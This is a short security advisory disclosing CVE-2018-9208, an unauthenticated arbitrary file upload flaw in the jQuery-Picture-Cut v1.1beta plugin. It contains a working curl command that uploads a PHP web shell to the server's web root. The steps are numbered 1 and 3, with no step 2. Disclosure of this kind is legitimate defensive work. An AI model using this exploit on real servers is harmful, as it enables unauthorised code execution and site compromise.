Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta

["Larry W. Cashdollar" <larry0 () me com>]

Title: Arbitrary file upload vulnerability in jQuery-Picture-Cut v1.1beta
Author: Larry W. Cashdollar, @_larry0
Date: 2018-11-02
CVE-ID:CVE-2018-9208
CWE: CWE-434 arbitrary file upload
Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut
Vendor: http://picturecut.tuyoshi.com.br/
Vendor Notified: 2018-11-03
Vendor Contact: tuyoshi_vinicius () hotmail com
Advisory: http://www.vapidlabs.com/advisory.php?v=207

Description: picture cut is a jquery plugin that handles images in a very friendly and simple way, with a beautiful 
interface based on bootstrap or jquery ui, has great features like ajax upload, drag image from explorer, image crop 
and others.

Vulnerability:
The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not 
check file type and allows the user to choose the file location path. An unauthenticated user and upload an executable 
PHP file to the server allowing code execution.

Exploit Code:

1. curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F 
"minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" 
-F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php

3. With folderOnServer=/ the shell will be in the main web directory path.